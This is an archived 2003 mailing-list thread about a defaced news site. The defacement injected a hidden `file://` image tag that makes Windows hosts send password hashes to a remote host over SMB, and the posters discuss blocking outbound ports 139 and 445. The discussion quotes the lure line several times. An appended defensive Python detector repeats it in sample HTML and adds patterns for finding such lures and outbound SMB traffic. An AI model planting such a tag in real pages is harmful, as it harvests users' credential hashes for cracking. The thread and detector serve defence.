Re: Importance of outbound traffic filtering

From: Barry Fitzgerald (bkfsecat_private)
Date: Wed Jul 30 2003 - 11:10:00 PDT


    Hello,
    
           What happens if you're in an Active Directory/Kerberos 
    environment?  Will it revert to sending the hash for NTLM auth or will 
    it just try to obtain a ticket for the resource?  Or, am I completely 
    barking up the wrong tree on this? :)  I seem to remember that it will 
    revert, but was wondering if anyone knew for sure.  Thanks in advance.
    
           -Barry
    
    
    Stark, Vernon L. wrote:
    
    >	A host that encounters content such as <img
    >src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to
    >contact the single host korean_ip_address. It does not try to do a DDOS.  If
    >ports 139 and 445 are not blocked outbound, the impact is that the host will
    >create a connection with the Korean host and attempt to authenticate.  This
    >authentication includes providing password hashes to the remote host.
    >
    >	What we've seen is a news site that repeatedly gets defaced.  The
    >defacement consists of simply adding the content listed above.  When users
    >are browsing the web and encounter this news site, their hosts attempt to
    >call Korea.  The packets all have the same destination IP address (the
    >Korean host) and their only intent is to establish a connection with the
    >Korean host.  There is no intent to do a DOS.  So, blocking outbound TCP 139
    >and 445 keeps your password hashes from being transmitted to Korea where
    >they might be cracked and used for gaining access to your network.  The
    >content simply provides a way to harvest password hashes.
    >
    >	By the way, I've also seen this content in an e-mail message.  Yes,
    >when the user opened the e-mail, his host started attempting to contact the
    >IP address listed in the offending content.
    >
    >Vern
    >
    >-----Original Message-----
    >From: Jack Lyons [mailto:jack.lyonsat_private]
    >Sent: Tuesday, July 22, 2003 12:39 PM
    >To: 'Stark, Vernon L.'; 'incidentsat_private'
    >Subject: RE: Importance of outbound traffic filtering
    >
    >
    >I block those ports and others outbound, but it would only stop DDOS attack
    >against people who left those ports open inbound - correct?
    >
    >  
    >
    >>-----Original Message-----
    >>From: Stark, Vernon L. [mailto:Vern.Starkat_private]
    >>Sent: Friday, July 18, 2003 10:13 AM
    >>To: 'incidentsat_private'
    >>Subject: Importance of outbound traffic filtering
    >>
    >>	For the third time since May 5th, a site which provides news about
    >>department of defense issues has apparently been defaced.  The hack is
    >>described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
    >>289-290).  The hack we noticed today is a web page with content of the
    >>form
    >>
    >><img src=file://korean_ip_address/test.jpg height=0 width=0>
    >>
    >>	If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
    >>hosts will attempt to send password hashes to the remote host.  Hosts may
    >>attempt to contact the remote host on other ports (e.g. 80) as well.  This
    >>clearly illustrates the importance of outbound traffic filtering.
    >>
    >>Vern Stark, GCIA, GSEC
    >>
    >>JHU/APL
    >>
    
    
    
    
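Two defender-side checks for what the thread describes, added here as an example (not code from Vern, Barry or anyone on the list): finding `<img src=file://host/...>` lures pointing at non-internal hosts in page content, and flagging outbound TCP 139/445 to non-internal destinations in firewall logs. The log format, HTML and addresses are constructed, and treating only RFC 1918, loopback and link-local space as "internal" is an assumption.

```python
import ipaddress
import re

# Ports the thread says should be blocked outbound: NetBIOS session (139) and SMB (445).
SMB_PORTS = {139, 445}

# Assumption: "internal" means RFC 1918 space plus loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_internal(host):
    """True for internal IPs; bare hostnames cannot be classified and are treated as external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

# Matches <img ... src=file://HOST/... >, quoted or unquoted, as in the defaced page.
IMG_FILE_RE = re.compile(r"<img\b[^>]*\bsrc\s*=\s*[\"']?file://([^/\"'\s>]+)", re.IGNORECASE)

def external_file_img_hosts(html):
    """Hosts referenced by file:// image sources that are not internal (the hash-harvest lure)."""
    return [h for h in IMG_FILE_RE.findall(html) if not is_internal(h)]

# Constructed iptables-style log format (hypothetical); fields come from SRC=/DST=/PROTO=/DPT=.
FW_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=(\S+) SPT=\d+ DPT=(\d+)")

def outbound_smb_to_external(log_text):
    """Return (src, dst, dport) for TCP flows to 139/445 whose destination is not internal."""
    hits = []
    for line in log_text.splitlines():
        m = FW_RE.search(line)
        if not m:
            continue
        src, dst, proto, dpt = m.groups()
        if proto == "TCP" and int(dpt) in SMB_PORTS and not is_internal(dst):
            hits.append((src, dst, int(dpt)))
    return hits

# Constructed sample inputs (TEST-NET addresses stand in for the external host).
SAMPLE_HTML = ('<p>news</p><img src=file://203.0.113.7/test.jpg height=0 width=0>'
               '<img src="file://10.0.0.5/logo.jpg">')
SAMPLE_FW_LOG = """\
Jul 30 10:01:02 fw kernel: OUT=eth0 SRC=10.0.0.15 DST=10.0.0.2 PROTO=TCP SPT=49152 DPT=445
Jul 30 10:01:05 fw kernel: OUT=eth0 SRC=10.0.0.15 DST=203.0.113.7 PROTO=TCP SPT=49153 DPT=445
Jul 30 10:01:06 fw kernel: OUT=eth0 SRC=10.0.0.15 DST=203.0.113.7 PROTO=TCP SPT=49154 DPT=139
Jul 30 10:01:09 fw kernel: OUT=eth0 SRC=10.0.0.15 DST=203.0.113.7 PROTO=TCP SPT=49155 DPT=80
"""
```

Running `external_file_img_hosts(SAMPLE_HTML)` reports only the external host, and `outbound_smb_to_external(SAMPLE_FW_LOG)` returns the two 445/139 attempts to it while ignoring the internal file-server connection and the port 80 flow.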



    This archive was generated by hypermail 2b30 : Thu Jul 31 2003 - 07:45:38 PDT